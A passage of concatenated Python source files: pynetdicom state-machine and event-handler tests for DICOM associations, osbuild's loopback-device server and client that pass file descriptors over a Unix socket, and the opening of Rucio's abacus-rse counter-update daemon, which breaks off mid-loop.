('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(fsm, scp=None)
scp.shutdown()
assert [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor(object):
"""Functional tests for StateMachine as association requestor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
time.sleep(0.1)
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_monkey_patch(self):
"""Test monkey patching of StateMachine works as intended."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = self.monkey_patch(assoc.dul.state_machine)
assert fsm.current_state == 'Sta1'
fsm.current_state = 'Sta13'
fsm.do_action('Evt3')
assert fsm._changes == [('Sta13', 'Evt3', 'AA-6')]
assert fsm._transitions == ['Sta13']
def test_associate_accept_release(self):
"""Test normal association/release."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_reject(self):
"""Test normal association rejection."""
self.scp = DummyVerificationSCP()
self.scp.ae.require_called_aet = True
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt4', 'AE-4'), # A-ASSOC-RJ PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_abort(self):
"""Test association acceptance then local abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.abort()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection closed
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_local_abort(self):
"""Test association acceptance then local abort if no cx."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.requestor.requested_contexts[0].abstract_syntax = '1.2.3'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
time.sleep(0.1)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection close
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # Connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_peer_abort(self):
"""Test association acceptance then peer abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.network_timeout = 0.5
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
while not self.assoc.is_established:
time.sleep(0.05)
while not self.assoc.is_aborted:
time.sleep(0.05)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt16', 'AA-3'), # A-ABORT-RQ PDV recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_send_data(self):
"""Test association acceptance then send DIMSE message."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.send_c_echo()
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta6',
'Sta6',
'Sta7', # Waitinf for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt9', 'DT-1'), # P-DATA rq primitive
('Sta6', 'Evt10', 'DT-2'), # P-DATA-TF PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_release_AR6(self):
"""Test receive P-DATA-TF while waiting for A-RELEASE-RP."""
# Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
# A-RELEASE-RP
# Patch AR-4 to also send a P-DATA-TF
orig_entry = FINITE_STATE.ACTIONS['AR-4']
def AR_4(dul):
# Send C-ECHO-RQ
dul.socket.send(p_data_tf)
# Normal release response
dul.pdu = A_RELEASE_RP()
dul.pdu.from_primitive(dul.primitive)
# Callback
dul.socket.send(dul.pdu.encode())
dul.artim_timer.start()
return 'Sta13'
# In this case the association acceptor will hit AR_4
FINITE_STATE.ACTIONS['AR-4'] = ('Bluh', AR_4, 'Sta13')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AR-4']= orig_entry
def test_release_AR7(self):
"""Test receive P-DATA primitive after A-RELEASE-RQ PDU."""
orig_entry = FINITE_STATE.ACTIONS['AR-2']
def AR_2(dul):
"""AR-2 occurs when an A-RELEASE-RQ PDU is received."""
# Add P-DATA primitive request
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = VerificationSOPClass
# Send C-ECHO request to the peer via DIMSE and wait for the response
dul.assoc.dimse.send_msg(primitive, 1)
# Normal AR2 response
dul.to_user_queue.put(dul.primitive)
return 'Sta8'
# In this case the association acceptor will hit AR_2
FINITE_STATE.ACTIONS['AR-2'] = ('Bluh', AR_2, 'Sta8')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AR-2']= orig_entry
class TestStateMachineFunctionalAcceptor(object):
"""Functional tests for StateMachine as association acceptor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
time.sleep(0.1)
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_invalid_protocol_version(self):
"""Test receiving an A-ASSOC-RQ with invalid protocol version."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
# Patch AE_2
orig_entry = FINITE_STATE.ACTIONS['AE-2']
def AE_2(dul):
dul.pdu = A_ASSOCIATE_RQ()
dul.pdu.from_primitive(dul.primitive)
dul.pdu.protocol_version = 0x0002
bytestream = dul.pdu.encode()
dul.socket.send(bytestream)
return 'Sta5'
FINITE_STATE.ACTIONS['AE-2'] = ('Bluh', AE_2, 'Sta5')
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.assoc.acceptor.primitive.result == 0x01
assert self.assoc.acceptor.primitive.result_source == 0x02
assert self.assoc.acceptor.primitive.diagnostic == 0x02
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AE-2']= orig_entry
class TestEventHandling(object):
"""Test the FSM event handlers."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_no_handlers(self):
"""Test with no handlers bound."""
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
scp.shutdown()
def test_transition_acceptor(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
assert event.event.name == 'EVT_FSM_TRANSITION'
assert event.event.description == "State machine about to transition"
states = [ee.current_state for ee in triggered]
assert states[:6] == ['Sta1', 'Sta2', 'Sta3', 'Sta6', 'Sta8', 'Sta13']
scp.shutdown()
def test_transition_acceptor_bind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
scp.bind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta6', 'Sta8', 'Sta13']
def test_transition_acceptor_unbind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
scp.unbind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta2', 'Sta3']
scp.shutdown()
def test_transition_requestor(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assert assoc.is_established
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:5] == ['Sta1', 'Sta4', 'Sta5', 'Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_bind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.bind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:2] == ['Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_unbind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta4', 'Sta5']
scp.shutdown()
def test_transition_raises(self, caplog):
"""Test the handler for EVT_FSM_TRANSITION raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.add_requested_context(VerificationSOPClass)
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
"handler 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
remoteloop.py
|
import array
import asyncio
import errno
import json
import os
import socket
import threading
import osbuild.loop as loop
__all__ = [
"LoopClient",
"LoopServer"
]
def load_fds(sock, msglen):
fds = array.array("i") # Array of ints
msg, ancdata, _, addr = sock.recvmsg(msglen, socket.CMSG_LEN(253 * fds.itemsize))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS):
# Append data, ignoring any truncated integers at the end.
fds.fromstring(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return json.loads(msg), list(fds), addr
def dump_fds(sock, obj, fds):
sock.sendmsg([json.dumps(obj).encode('utf-8')], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))])
class LoopServer:
"""Server for creating loopback devices
The server listens for requests on a AF_UNIX/SOCK_DRGAM sockets.
A request should contain SCM_RIGHTS of two filedescriptors, one
that sholud be the backing file for the new loopdevice, and a
second that should be a directory file descriptor where the new
device node will be created.
The payload should be a JSON object with the mandatory arguments
@fd which is the offset in the SCM_RIGHTS array for the backing
file descriptor and @dir_fd which is the offset for the output
directory. Optionally, @offset and @sizelimit in bytes may also
be specified.
The server respods with a JSON object containing the device name
of the new device node created in the output directory.
The created loopback device is guaranteed to be bound to the
given backing file descriptor for the lifetime of the LoopServer
object.
"""
def __init__(self, sock):
self.devs = []
self.sock = sock
self.ctl = loop.LoopControl()
self.event_loop = asyncio.new_event_loop()
self.event_loop.add_reader(self.sock, self._dispatch)
self.thread = threading.Thread(target=self._run_event_loop)
def __del__(self):
self.sock.close()
def _create_device(self, fd, dir_fd, offset=None, sizelimit=None):
while True:
# Getting an unbound loopback device and attaching a backing
# file descriptor to it is racy, so we must use a retry loop
lo = loop.Loop(self.ctl.get_unbound())
try:
lo.set_fd(fd)
except OSError as e:
if e.errno == errno.EBUSY:
continue
raise e
break
lo.set_status(offset=offset, sizelimit=sizelimit, autoclear=True)
lo.mknod(dir_fd)
# Pin the Loop objects so they are only released when the LoopServer
# is destroyed.
self.devs.append(lo)
return lo.devname
def _dispatch(self):
args, fds, addr = load_fds(self.sock, 1024)
fd = fds[args["fd"]]
dir_fd = fds[args["dir_fd"]]
offset = args.get("offset")
sizelimit = args.get("sizelimit")
devname = self._create_device(fd, dir_fd, offset, sizelimit)
ret = json.dumps({"devname": devname})
self.sock.sendto(ret.encode('utf-8'), addr)
def _run_event_loop(self):
# Set the thread-local event loop
asyncio.set_event_loop(self.event_loop)
# Run event loop until stopped
self.event_loop.run_forever()
def __enter__(self):
self.thread.start()
def __exit__(self, *args):
self.event_loop.call_soon_threadsafe(self.event_loop.stop)
self.thread.join()
class LoopClient:
def __init__(self, sock):
self.sock = sock
def __del__(self):
self.sock.close()
def create_device(self, fd, dir_fd=None, offset=None, sizelimit=None):
req = {}
fds = array.array("i")
if not dir_fd:
dir_fd = os.open("/dev", os.O_DIRECTORY)
fds.append(fd)
req["fd"] = 0
fds.append(dir_fd)
req["dir_fd"] = 1
if offset:
req["offset"] = offset
if sizelimit:
req["sizelimit"] = sizelimit
dump_fds(self.sock, req, fds)
ret = json.loads(self.sock.recv(1024))
return ret["devname"]
|
rse.py
|
# Copyright 2014-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2014-2016
# - Vincent Garonne <vgaronne@gmail.com>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019-2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
#
# PY3K COMPATIBLE
"""
Abacus-RSE is a daemon to update RSE counters.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.utils import get_thread_with_periodic_running_function
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rse_counter import get_updated_rse_counters, update_rse_counter, fill_rse_counter_history_table
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rse_update(once=False):
"""
Main loop to check and update the RSE Counters.
"""
logging.info('rse_update: starting')
logging.info('rse_update: started')
# Make an initial heartbeat so that all abacus-rse daemons have the correct worker number on the next try
executable = 'abacus-rse'
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
while not graceful_stop.is_set():
try:
# Heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
# Select a bunch of rses for to update for this worker
start = time.time() # NOQA
rse_ids = get_updated_rse_counters(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'])
logging.debug('Index query time %f size=%d' % (time.time() - start, len(rse_ids)))
# If the list is empty, sent the worker to sleep
if not rse_ids and not once:
logging.info('rse_update[%s/%s] did not get any work' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1))
time.sleep(10)
else:
for rse_id in rse_ids:
if graceful_stop.is_set():
break
start_time = time.time()
update_rse_counter(rse_id=rse_id)
